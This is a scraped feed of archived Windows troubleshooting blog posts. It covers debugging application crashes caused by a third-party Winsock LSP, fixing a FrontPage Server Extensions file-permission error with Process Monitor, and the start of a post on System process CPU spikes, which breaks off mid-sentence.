style="mso-spacerun: yes"> <IMG height="279" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3064679/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3064679/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121031i1B9ED7A674EB31A0" style="WIDTH: 354px; HEIGHT: 279px" width="354" /> </SPAN> </FONT> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> I started examining threads by selecting the first entry in the threads dialog: </FONT> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="107" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3064680/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3064680/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121032iDF79082DBD265504" style="WIDTH: 281px; HEIGHT: 107px" width="281" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The WinDbg command window usually grays and says “Busy” as WinDbg pulls symbols from the symbol server, after which the call stack dialog populates with the function nesting of the selected thread at the time of the crash. I examined each thread’s stack in turn, moving between threads by pressing the down arrow and then the enter key, hunting for a stack that had function names with the words “exception” or “fault” in them. Near the end of the list I came across this one: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="293" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3064681/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3064681/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121033iDC1A33DCA60689EE" style="WIDTH: 550px; HEIGHT: 293px" width="550" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I noticed that the top of the list is full of functions with “Exception” in their names. Looking down the list (up the stack), I saw that a function in Nvappfilter called Kernel32.dll’s HeapFree function, leading to the crash. The exception in the heap’s free routines meant that either the caller passed a bogus heap address or that the heap was already corrupted when the function executed. If a Windows DLL had been the caller I would have suspected the latter, but in this case the caller was a third-party DLL, which I could tell by the fact that WinDbg couldn’t locate symbol information for it and hence didn’t know the names of the functions within it. I confirmed that by issuing the <I style="mso-bidi-font-style: normal"> lm </I> (list module) command to look at its version information: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="355" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3064682/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3064682/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121034i39584B226EEB6A6F" style="WIDTH: 550px; HEIGHT: 355px" width="550" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Nvappfilter was now my primary suspect, but I didn’t have direct evidence that it was responsible. I continued to use the system and followed the same debugging steps on the next several crashes. Whether it was IE, WMP or a game, the faulting stack was always the same, with Nvappfilter calling HeapFree. That’s still not conclusive proof, but the anecdotal evidence was pretty compelling. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> At that point I went to see if there were updates for Nvappfilter, but I wasn’t sure what software package it was associated with. I entered its name in a Web search and discovered that it’s part of the nVidia’s FirstPacket feature that prioritizes game traffic and that’s included in the nForce motherboard’s software: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="373" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3064683/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3064683/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121035i65FB9CA06750F8BE" style="WIDTH: 550px; HEIGHT: 373px" width="550" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I went to nVidia’s site and downloaded the most recent nForce driver package, but it failed to update Nvappfilter.dll and I continued to have the crashes. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The nVidia control panel offers no way that I could find to prevent Nvappfilter from loading, so my only recourse was to manually disable it. I wasn’t using the FirstPacket feature, which I had previously been unaware of, so I wouldn’t miss it, but first I had to figure out how it configured Windows to load it. For that I turned to <A class="" href="#" mce_href="#" target="_blank"> Autoruns </A> , where I found references to Nvappfilter’s 32-bit and 64-bit versions in the Winsock Layered Service Provider (LSP) section: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="248" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3064684/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3064684/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121036i1E0D8C58A09AE42D" style="WIDTH: 550px; HEIGHT: 248px" width="550" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I deleted all of Nvappfilter’s entries, rebooted the system and have been crash-free since. While I was writing this post, I checked again for nForce software updates to see if Nvappfilter had been updated. The latest version doesn’t look like it includes Nvappfilter or any other Winsock LSP, so assuming Nvappfilter was at fault, it’s no longer an issue. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> One other thing I’ve done since I investigated these crashes is take advantage of Vista SP1’s <A class="" href="#" mce_href="#" target="_blank"> “local dumps” functionality </A> so that I'll&nbsp;automatically&nbsp;get a&nbsp;crash dump to investigate for any application crash I experience. If you create a key named HKLM\Software\Microsoft\Windows\Windows Error Reporting\LocalDumps, WerFault will always save a dump. Crashes go by default into %LOCALAPPDATA%\Crashdumps, but you can override that with a Registry value and also specify a limit on the number of crashes WerFault will keep. </FONT> </P> </BODY></HTML> Thu, 27 Jun 2019 06:40:50 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-random-ie-and-wmp-crashes/ba-p/723654 MarkRussinovich 2019-06-27T06:40:50Z Guest Post: The Case of the FrontPage Error https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/guest-post-the-case-of-the-frontpage-error/ba-p/723637 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on May 13, 2008 </STRONG> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> Welcome to the first guest "Case Of" blog post!&nbsp;I've received numerous great troubleshooting cases over the last two months and have selected this one, submitted by Troy Wolbrink,&nbsp;a corporate web master, as the first to share with you. </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> Troy ran into a problem with his web server and instead of rebooting, reinstalling, or calling Microsoft Product Support Services (who would have <EM> undoubtedly </EM> suggested the same steps Troy followed on his own, but cost Troy an incident), he used basic troubleshooting techniques to solve it in a few minutes. </FONT> </SPAN> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> Like for everyone else that's submitted a well-documented case with screenshots and log files, I sent Troy a signed copy of <A class="" href="#" mce_href="#" target="_blank"> Windows Internals </A> as a thanks. </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> I'm including some of the cases I've received in my " <A class="" href="#" mce_href="#" target="_blank"> Case of the Unexplained... </A> " talk again at <A class="" href="#" mce_href="#" target="_blank"> TechEd/IT Pro </A> in June. In fact, even&nbsp;if you've watched the webcast from last November's TechEd/ITForum, be sure to come to the session as it consists of entirely new new cases. </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> Before I present the case, I want to share a&nbsp;clever user-produced video that serves as both a tutorial and demonstration of <A class="" href="#" mce_href="#" target="_blank"> Zoomit </A> , a screen magnifier and annotation tool I developed as an aid for my presentations.&nbsp;You can find the video <A class="" href="#" mce_href="#" target="_blank"> here </A> . </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> Enjoy Troy's post and the Zoomit video and please keep submitting your troubleshooting cases! </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> -Mark </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> </FONT> </SPAN> </P> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-SIZE: 16pt; FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin; mso-bidi-font-size: 12.0pt"> The Case of the FrontPage Error </SPAN> <SPAN style="FONT-SIZE: 16pt; mso-bidi-font-size: 12.0pt"> </SPAN></P><P> </P> </SPAN> <P></P> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> </SPAN> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <I style="mso-bidi-font-style: normal"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> by Windows Detective Troy Wolbrink </FONT> </SPAN> </I> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <I style="mso-bidi-font-style: normal"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> </FONT> </SPAN> </I></P><P> </P> <P></P> </SPAN> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> </SPAN> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> I recently transitioned my website from shared hosting to my own dedicated server. <SPAN style="mso-spacerun: yes"> </SPAN> Parts of my website were using FrontPage Server Extensions (FPSE), such as&nbsp;the page which collected data and logged the results to a text file: </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> </SPAN> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> <IMG height="557" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3054807/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3054807/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121021i83A1B4DD5D9DA3E5" style="WIDTH: 475px; HEIGHT: 557px" width="475" /> </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> I installed FPSE using the Add/Remove Windows Components control panel applet, and then I did my best to configure them correctly with IIS. <SPAN style="mso-spacerun: yes"> </SPAN> But for some reason I could not get FPSE configured correctly such that my data collection form would work. <SPAN style="mso-spacerun: yes"> </SPAN> The error message from the browser was very vague: </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <IMG height="151" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3054808/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3054808/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121022iEF78229A49D972B1" style="WIDTH: 475px; HEIGHT: 151px" width="475" /> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> I looked for more information in the Event Log on the server, but it&nbsp;had nothing relevant. </FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> </SPAN></P><P> <FONT size="3"> </FONT> </P> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <P> <FONT size="3"> </FONT> </P> </SPAN> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> My plan was to eventually replace this site with one built on ASP.NET and SQL Server, so I wasn’t feeling motivated to become a FPSE expert just to solve this one problem. <SPAN style="mso-spacerun: yes"> </SPAN> But since other priorities are preventing this move to ASP.NET from happening for another year, so I had no choice but to investigate. </FONT> </SPAN> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> I had just seen Mark’s talk on “ <A class="" href="#" mce_href="#" target="_blank"> The Case of the Unexplained... </A> ”, and I was inspired to run <A class="" href="#" mce_href="#" target="_blank"> Process Monitor </A> on my server to see if any clues to the problem might appear. <SPAN style="mso-spacerun: yes"> </SPAN> I excluded events from some obvious processes that had nothing to do with the problem. <SPAN style="mso-spacerun: yes"> </SPAN> This removed a lot of the noise. <SPAN style="mso-spacerun: yes"> </SPAN> Since my web page was “TntWebLog.htm” and since it was writing to “TntWebLog.csv” I configured it to highlight anything with a Path containing “TntWebLog”. <SPAN style="mso-spacerun: yes"> </SPAN> </FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> </SPAN></P><P> <FONT size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> To reproduce the problem, I pulled up my web browser and tried to submit the form. <SPAN style="mso-spacerun: yes"> </SPAN> Then back in Process Monitor I told it to stop capturing events. <SPAN style="mso-spacerun: yes"> </SPAN> I then scrolled down through the list looking for highlighted entries. <SPAN style="mso-spacerun: yes"> </SPAN> It was astonishing how quickly I found the problem. <SPAN style="mso-spacerun: yes"> </SPAN> FPSE was trying to create the file with the same name as the existing file: </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> </SPAN></P><P> <FONT size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> </SPAN></P><P> <FONT size="3"> <IMG height="198" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3054809/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3054809/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121023i09E7D98FD24B612E" style="WIDTH: 550px; HEIGHT: 198px" width="550" /> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> Obviously something was up with file permissions here. <SPAN style="mso-spacerun: yes"> </SPAN> I checked the file permissions for TntWebLog.csv and it didn’t have a listing for the IUSR_WEBBOARD account which is what is configured in IIS for anonymous access: </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> <IMG height="416" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3054810/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3054810/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121024i4F445A9D11631D23" style="WIDTH: 309px; HEIGHT: 416px" width="309" /> </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> So I clicked Advanced, checked the box for “Allow inheritable permissions from the parent to propagate…” and clicked “OK”: </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> </SPAN></P><P> <FONT size="3"> <IMG height="241" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3054811/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3054811/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121025iD5F2D9682B4B1D85" style="WIDTH: 368px; HEIGHT: 241px" width="368" /> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> </SPAN></P><P> <FONT size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> </SPAN></P><P> <FONT size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> Doing this caused the proper security permissions to be configured for the file. I ran another test and the problem was solved! </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> </SPAN></P><P> <FONT size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> Looking back I believe that this problem occurred because I used Windows Explorer to “Move” and not “Copy” the csv file into place. <SPAN style="mso-spacerun: yes"> </SPAN> I did some more tests to confirm this. <SPAN style="mso-spacerun: yes"> </SPAN> When you “Move” a file within the same volume using Windows Explorer, the file permissions are moved with it. <SPAN style="mso-spacerun: yes"> </SPAN> When you “Copy” a file using Windows Explorer, it creates a new file that inherits permissions from the target folder. <SPAN style="mso-spacerun: yes"> </SPAN> If I had originally performed a “Copy” this problem would have never happened. </FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> </SPAN></P><P> <FONT size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> Now my first reaction to unexplained problems will be to run Process Monitor and see what’s going on under the hood! </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> -Troy Wolbrink </FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> </SPAN></P><P> <FONT size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> </SPAN></P><P> <FONT size="3"> </FONT> </P> <P></P> </BODY></HTML> Thu, 27 Jun 2019 06:39:33 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/guest-post-the-case-of-the-frontpage-error/ba-p/723637 MarkRussinovich 2019-06-27T06:39:33Z The Case of the System Process CPU Spikes https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-system-process-cpu-spikes/ba-p/723630 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Apr 07, 2008 </STRONG> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> As you’ve probably surmised by my blog posts and other writings, I like knowing exactly what my systems are doing. I want to know if a process is running away with the CPU, causing memory pressure, or hitting the disk. Besides keeping my computers running smoothly, my vigilance sometimes helps me spot performance and reliability problems in Windows and third-party code. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The main way I keep tabs on things is to configure <A class="" href="#" mce_href="#" target="_blank"> Process Explorer </A> </FONT> <FONT face="Calibri" size="3"> to run automatically when I log in. Whenever I configure a new computer, I add a shortcut to Process Explorer to my profile’s Start directory that includes the /t (minimize) switch. Process Explorer runs otherwise hidden with tray icon that shows a small historical view of CPU activity level. Because I want access to detailed information about system processes, as well as my own, I also specify the /e option on Vista, which causes Windows to present a UAC prompt on logon that allows me to grant Process Explorer administrative rights. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Because I keep an eye out for CPU spikes in Process Explorer’s tray icon, which show up as green or red for user-mode (application) and kernel-mode (operating system and drivers) CPU usage, respectively, I’ve identified several application bugs over the last few months. In this post, I’ll share how I used both Process Explorer and another tool, Kernrate, to identify a problem with a third-party driver and followed the problem through to a fix by the vendor. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Not long after I got a new laptop several months ago, I noticed that the system sometimes felt sluggish. Process Explorer’s tray icon corroborated my perception by displaying a mini-graph of red CPU activity. The icon opens a tooltip that reports the name of the process consuming the most CPU when you move the mouse over it, and in this case the tooltip showed the System process as being responsible: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <IMG height="68" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3030297/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3030297/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121015i6258BAB477430F2C" style="WIDTH: 125px; HEIGHT: 68px" width="125" /> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> <SPAN style="mso-spacerun: yes"> </SPAN> The first few times I noticed the problem, it resolved itself shortly after and I didn’t have a chance to troubleshoot. However, I could see by opening Process Explorer’s System Information dialog that the CPU spikes 